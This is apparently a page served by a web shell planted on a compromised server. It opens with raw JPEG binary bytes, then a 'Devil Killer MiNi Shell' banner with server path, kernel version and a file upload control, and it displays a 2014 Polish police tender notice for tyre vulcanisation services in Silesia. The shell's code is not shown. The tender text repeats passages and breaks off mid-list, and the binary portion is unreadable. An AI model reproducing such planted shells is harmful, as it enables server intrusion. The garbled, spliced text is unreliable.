JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140822/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140822/280024-N-2014.html

<p class="kh_header"><b>Katowice: Usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego</b><br>
<b>Numer ogłoszenia: 280024 - 2014; data zamieszczenia: 22.08.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Wojewódzka Policji w Katowicach , ul. J. Lompy 19, 40-038 Katowice, woj. śląskie, tel. 032 2002050, faks 032 2002060.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://bip.katowice.kwp.policja.gov.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Nazwa nadana zamówieniu: ZP-2380-415-467-22/2014 Usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego 
2. kod CPV:	50 11 65 00-6
3. Przedmiotem zamówienia jest usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego. Jest to zamówienie udzielane w częściach a niniejsze zamówienie obejmuje cztery zadania:
4. 
Zadanie nr 1 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KMP Chorzów z siedzibą w 41-503 Chorzów przy ul. Legnicka 1.

Zadanie nr 2 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KPP Wodzisław Śląski z siedzibą w Wodzisławiu Śląskim 44-313 przy ul. Kokoszycka 180 b.

Zadanie nr 3 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KMP Gliwice z siedzibą w Gliwicach 44-100 przy ul. Powstańców Warszawskich 10-12.

Zadanie nr 4 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KMP Dąbrowa Górnicza z siedzibą 44-100 Gliwice przy Al. Piłsudskiego 11.

5. Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, tj.: pojazdów osobowych i typu furgon, będących na stanie ww jednostek
a. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne, naprawę kół, wyważanie kół i wymianę kół z wyważaniem.
b. Zamawiający planuje realizację usług wulkanizacyjnych w zakresie wynikającym z ilości samochodów będących na stanie danej jednostki terenowej: 
Zadanie nr 1 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez KMP Chorzów: 39 szt pojazdów osobowych i 9 szt. pojazdów typu furgon. Szacunkowe ilości usług zostały podane w załączniku nr 3 do SIWZ
Zadanie nr 2 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez KPP Wodzisław Śląski 29 szt pojazdów osobowych i 9 szt. pojazdów typu furgon. Szacunkowe ilości usług zostały podane w załączniku nr 3 do SIWZ
Zadanie nr 3 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez KMP Gliwice 72 szt pojazdów osobowych i 15 szt. pojazdów typu furgon. Szacunkowe ilości usług zostały podane w załączniku nr 3 do SIWZ
Zadanie nr 4 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez KMP Dąbrowa Górniczą 28 szt pojazdów osobowych i 9 szt. pojazdów typu furgon. Szacunkowe ilości usług zostały podane w załączniku nr 3 do SIWZ
c. 	Faktyczna częstotliwość i rodzaj wykonywanych usług wynikać będzie z rzeczywistych napraw 	wulkanizacyjnych. Zamawiający zastrzega sobie możliwość zwiększenia liczby napraw 	wulkanizacyjnych, przy czym ich łączna wartość nie może przekroczyć wartości określonej w umowie. 	Zamawiający zastrzega, że ilość pojazdów w trakcie trwania umowy może ulec zmianie.
d. 	Szczegółowe informacje dotyczące realizacji przedmiotu zamówienia znajdują się w załączniku nr 2 do 	SIWZ - Umowa projekt
6. Zamawiający wymaga aby punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia (stacja obsługi) był zlokalizowany w odległości nie przekraczającej 5 km liczonych po trasie od siedziby jednostki terenowej tj.

Zadanie nr 1 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KMP Chorzów z siedzibą w 41-503 Chorzów przy ul. Legnicka 1.

Zadanie nr 2 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KPP Wodzisław Śląski z siedzibą w Wodzisławiu Śląskim 44-313 przy ul. Kokoszycka 180 b.

Zadanie nr 3 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KMP Gliwice z siedzibą w Gliwicach 44-100 przy ul. Powstańców Warszawskich 10-12.

Zadanie nr 4 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KMP Dąbrowa Górnicza z siedzibą 44-100 Gliwice przy Al. Piłsudskiego 11.
a. 	Zamawiający wymaga aby Wykonawca wskazał w ofercie dokładny adres (kod pocztowy, 			miejscowość, ulicę, numer lub numery) punktu usługowego z zapleczem technicznym 				umożliwiającym wykonanie w całości przedmiotu zamówienia (stacji obsługi) dla danego zadania.
b. 	Zamawiający dokona oceny spełniania wymagania za pomocą programu www.zumi.pl tj. w zakładce wyznaczenie trasy  zostanie uruchomiona zakładka własny transport po czym w pozycji 1 zostanie wpisany 	adres miejsca świadczenia usługi, a w pozycji 2 miejsca siedziby jednostki terenowej.
c.	Oferty w których odległość punktu usługowego (stacji obsługi) od siedziby jednostki terenowej (KMP 	Chorzów, KPP Wodzisław Śląski, KMP Gliwice, KMP Dąbrowa Górnicza) będzie przekraczała 5 km 	liczonych po trasie zostaną uznane za niezgodne z wymaganiami SIWZ i odrzucone na podstawie art. 89 ust. 1 	pkt 2 ustawy Prawo Zamówień Publicznych.
7. Zamawiający wymaga aby punkt usługowy wskazany do wykonywania usług dla danego zadania posiadał odpowiednie zaplecze techniczne umożliwiające wykonanie w całości przedmiotu zamówienia. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
8. Zamawiający wymaga aby punkt usługowy wskazany do wykonywania usług dla danego zadania był czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
9. Zamawiający wymaga aby ceny jednostkowe netto podane w ofercie dla danego zadania nie uległy zmianie i obowiązywały przez cały okres umowy. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
10. Zamawiający informuje, iż na etapie badania i oceny ofert będzie przeliczał dla każdego zadani osobno ceny jednostkowe podane w ofertach przez szacunkowe ilości usług podane w załącznikach: nr 3 do SIWZ dla zadania nr 1,2,3 i nr 4 DO SIWZ. Jeżeli wyliczona kwota dla danego zadania będzie wyższa od kwoty jaką Zamawiający zamierzał przeznaczyć na sfinansowanie zamówienia dla danego zadania, Zamawiający uzna, iż cena oferty dla danego zadania przewyższa kwotę, którą Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia dla danego zadania.
11. Umowa w niniejszym postępowaniu zostanie zawarta na kwotę, jaką Zamawiający zamierza przeznaczyć na realizację zamówienia, a podaną w trakcie otwarcia ofert. 
12. Cenę brutto dla danego zadania obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.
13. Rozliczenie za zrealizowane usługi będzie następować wg cen jednostkowych każdej pozycji wskazanych w tabelach załącznika nr 1 do SIWZ - formularzu ofertowym dla danego zadania.
14. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom dla danego zadania. Zamawiający wymaga od Wykonawcy oświadczenia złożonego w załączniku nr 1 do SIWZ - formularzu ofertowym czy powierza podwykonawcy/com wykonanie zamówienia dla danego zadania. W przypadku powierzenia podwykonawcy/com wykonania zamówienia Zamawiający wymaga wskazania zakresu jaki będzie realizował Wykonawca przy jego/ich udziale dla danego zadania. W przypadku braku oświadczenia Zamawiający uzna, iż Wykonawca wykona zamówienie bez udziału podwykonawców..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielić zamówień uzupełniających do wysokości 50% zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.11.65.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Wskazanie adresu dla danego zadania (należy podać dokładny adres: kod pocztowy, miejscowość, ulicę, numer lub numery) punktu usługowego z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia  (stacji obsługi) zlokalizowanego w odległości nie przekraczającej 5 km liczonych po trasie od siedziby jednostki terenowej dla danego zadania złożone na załączniku nr 1 do SIWZ - formularz ofertowy lub na odrębnym dokumencie.
2. Oświadczenie Wykonawcy, że punkt usługowy dla danego zadania pod wskazanym adresem posiada odpowiednie zaplecze techniczne umożliwiające wykonanie w całości przedmiotu zamówienia - złożone na załączniku nr 1 do SIWZ - formularz ofertowy lub na odrębnym dokumencie.
3. Oświadczenie Wykonawcy, że punkt usługowy dla danego zadania pod wskazanym adresem będzie czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę - złożone na załączniku nr 1 do SIWZ - formularz ofertowy lub na odrębnym dokumencie.
4. Oświadczenie Wykonawcy, że ceny jednostkowe netto podane w ofercie dla danego zadania nie ulegną zmianie i będą obowiązywały przez cały okres umowy - złożone na załączniku nr 1 do SIWZ - formularz ofertowy lub na odrębnym dokumencie.
5. Oświadczenie Wykonawcy czy powierza podwykonawcy/com wykonanie zamówienia dla danego zadania. W przypadku powierzenia podwykonawcy/com wykonania zamówienia dla danego zadania Wykonawca wskaże zakres jaki będzie realizował przy jego/ich udziale - złożone na załączniku nr 1 do SIWZ - formularz ofertowy lub na odrębnym dokumencie.</p></li>



</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Postanowienia dotyczące realizacji zamówienia są zawarte w załączniku nr 2 do SIWZ - projekt umowy.
2. Jednocześnie w myśl art. 144 ust. 1 ustawy PZP Zamawiający dopuszcza możliwość zmian postanowień umowy w przypadku ustawowej zmiany stawki podatku VAT w czasie realizacji zamówienia o wielkość tej stawki.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.katowice.kwp.policja.gov.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komendzie Wojewódzkiej Policji w Katowicach, Zespół Zamówień Publicznych 40-038 Katowice ul. J. Lompy 19 blok C, piętro VII, pokój 747.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.09.2014 godzina 10:00, miejsce: Komendzie Wojewódzkiej Policji w Katowicach, Zespół Zamówień Publicznych 40-038 Katowice ul. J. Lompy 19 blok C, piętro VII, pokój 747.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dla każdego zadania termin wykonania zamówienia rozpoczyna się z dniem zawarcia umowy, przez okres 24 miesięcy lub do dnia wykorzystania środków przeznaczonych na realizację niniejszego zamówienia dla danego zadania..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KMP Chorzów z siedzibą w 41-503 Chorzów przy ul. Legnicka 1..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Nazwa nadana zamówieniu: ZP-2380-415-467-22/2014 Usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego 
2. kod CPV:	50 11 65 00-6
3. Przedmiotem zamówienia jest usługa wulkanizacji opon w pojazdach służbowych jednostek Policji województwa śląskiego. Jest to zamówienie udzielane w częściach a niniejsze zamówienie obejmuje trzy zadania:
4. 
Zadanie nr 1 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KMP Chorzów z siedzibą w 41-503 Chorzów przy ul. Legnicka 1.

5. Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, tj.: pojazdów osobowych i typu furgon, będących na stanie ww jednostek
a. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne, naprawę kół, wyważanie kół i wymianę kół z wyważaniem.
b. Zamawiający planuje realizację usług wulkanizacyjnych w zakresie wynikającym z ilości samochodów będących na stanie danej jednostki terenowej: 
Zadanie nr 1 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez KMP Chorzów: 39 szt pojazdów osobowych i 9 szt. pojazdów typu furgon. Szacunkowe ilości usług zostały podane w załączniku nr 3 do SIWZ

c. 	Faktyczna częstotliwość i rodzaj wykonywanych usług wynikać będzie z rzeczywistych napraw 	wulkanizacyjnych. Zamawiający zastrzega sobie możliwość zwiększenia liczby napraw 	wulkanizacyjnych, przy czym ich łączna wartość nie może przekroczyć wartości określonej w umowie. 	Zamawiający zastrzega, że ilość pojazdów w trakcie trwania umowy może ulec zmianie.
d. 	Szczegółowe informacje dotyczące realizacji przedmiotu zamówienia znajdują się w załączniku nr 2 do 	SIWZ - Umowa projekt
6. Zamawiający wymaga aby punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia (stacja obsługi) był zlokalizowany w odległości nie przekraczającej 5 km liczonych po trasie od siedziby jednostki terenowej tj.

Zadanie nr 1 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KMP Chorzów z siedzibą w 41-503 Chorzów przy ul. Legnicka 1.

a. 	Zamawiający wymaga aby Wykonawca wskazał w ofercie dokładny adres (kod pocztowy, 			miejscowość, ulicę, numer lub numery) punktu usługowego z zapleczem technicznym 				umożliwiającym wykonanie w całości przedmiotu zamówienia (stacji obsługi) dla danego zadania.
b. 	Zamawiający dokona oceny spełniania wymagania za pomocą programu www.zumi.pl tj. w zakładce 	wyznaczenie trasy zostanie uruchomiona zakładka własny transport po czym w pozycji 1 zostanie wpisany 	adres miejsca świadczenia usługi, a w pozycji 2 miejsca siedziby jednostki terenowej.
c.	Oferty w których odległość punktu usługowego (stacji obsługi) od siedziby jednostki terenowej (KMP 	Chorzów, KPP Wodzisław Śląski, KMP Gliwice, KMP Dąbrowa Górnicza) będzie przekraczała 5 km 	liczonych po trasie zostaną uznane za niezgodne z wymaganiami SIWZ i odrzucone na podstawie art. 89 ust. 1 	pkt 2 ustawy Prawo Zamówień Publicznych.
7. Zamawiający wymaga aby punkt usługowy wskazany do wykonywania usług dla danego zadania posiadał odpowiednie zaplecze techniczne umożliwiające wykonanie w całości przedmiotu zamówienia. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
8. Zamawiający wymaga aby punkt usługowy wskazany do wykonywania usług dla danego zadania był czynny minimum 8 godzin dziennie od poniedziałku do piątku oraz minimum 4 godziny w sobotę. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
9. Zamawiający wymaga aby ceny jednostkowe netto podane w ofercie dla danego zadania nie uległy zmianie i obowiązywały przez cały okres umowy. Zamawiający dokona oceny spełniania wymagania na podstawie złożonego oświadczenia Wykonawcy.
10. Zamawiający informuje, iż na etapie badania i oceny ofert będzie przeliczał dla każdego zadani osobno ceny jednostkowe podane w ofertach przez szacunkowe ilości usług podane w załącznikach: nr 3 do SIWZ dla zadania nr 1,2,3 i nr 4 DO SIWZ. Jeżeli wyliczona kwota dla danego zadania będzie wyższa od kwoty jaką Zamawiający zamierzał przeznaczyć na sfinansowanie zamówienia dla danego zadania, Zamawiający uzna, iż cena oferty dla danego zadania przewyższa kwotę, którą Zamawiający zamierza przeznaczyć na sfinansowanie zamówienia dla danego zadania.
11. Umowa w niniejszym postępowaniu zostanie zawarta na kwotę, jaką Zamawiający zamierza przeznaczyć na realizację zamówienia, a podaną w trakcie otwarcia ofert. 
12. Cenę brutto dla danego zadania obliczoną wg pkt X SIWZ należy podać w celu wyboru najkorzystniejszej oferty.
13. Rozliczenie za zrealizowane usługi będzie następować wg cen jednostkowych każdej pozycji wskazanych w tabelach załącznika nr 1 do SIWZ - formularzu ofertowym dla danego zadania.
14. Wykonawca może powierzyć wykonanie zamówienia podwykonawcom dla danego zadania. Zamawiający wymaga od Wykonawcy oświadczenia złożonego w załączniku nr 1 do SIWZ - formularzu ofertowym czy powierza podwykonawcy/com wykonanie zamówienia dla danego zadania. W przypadku powierzenia podwykonawcy/com wykonania zamówienia Zamawiający wymaga wskazania zakresu jaki będzie realizował Wykonawca przy jego/ich udziale dla danego zadania. W przypadku braku oświadczenia Zamawiający uzna, iż Wykonawca wykona zamówienie bez udziału podwykonawców.5. Przedmiot zamówienia obejmuje serwis opon w pojazdach służbowych o dmc do 3,5 tony, tj.: pojazdów osobowych i typu furgon, będących na stanie ww jednostek
a. Zakres serwisu opon obejmuje: wymianę opon z zimowych na letnie, z letnich na zimowe oraz naprawy wulkanizacyjne, naprawę kół, wyważanie kół i wymianę kół z wyważaniem.
b. Zamawiający planuje realizację usług wulkanizacyjnych w zakresie wynikającym z ilości samochodów będących na stanie danej jednostki terenowej: 
Zadanie nr 1 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez KMP Chorzów: 39 szt pojazdów osobowych i 9 szt. pojazdów typu furgon. Szacunkowe ilości usług zostały podane w załączniku nr 3 do SIWZ
c. 	Faktyczna częstotliwość i rodzaj wykonywanych usług wynikać będzie z rzeczywistych napraw 	wulkanizacyjnych. Zamawiający zastrzega sobie możliwość zwiększenia liczby napraw 	wulkanizacyjnych, przy czym ich łączna wartość nie może przekroczyć wartości określonej w umowie. 	Zamawiający zastrzega, że ilość pojazdów w trakcie trwania umowy może ulec zmianie.
d. 	Szczegółowe informacje dotyczące realizacji przedmiotu zamówienia znajdują się w załączniku nr 2 do 	SIWZ - Umowa projekt
6. Zamawiający wymaga aby punkt usługowy z zapleczem technicznym umożliwiającym wykonanie w całości przedmiotu zamówienia (stacja obsługi) był zlokalizowany w odległości nie przekraczającej 5 km liczonych po trasie od siedziby jednostki terenowej tj.

Zadanie nr 1 - Usługa serwisu opon w pojazdach służbowych użytkowanych przez  KMP Chorzów z siedzibą w 41-503 Chorzów przy ul. Legnicka 1.

a. 	Zamawiający wymaga aby Wykonawca wskazał w ofercie dokładny adres (kod pocztowy, 			miejscowość, ulicę, numer lub numery) punktu usługowego z zapleczem technicznym 				umożliwiającym wykonanie w całości przedmiotu zamówienia (stacji obsługi) dla danego zadania.
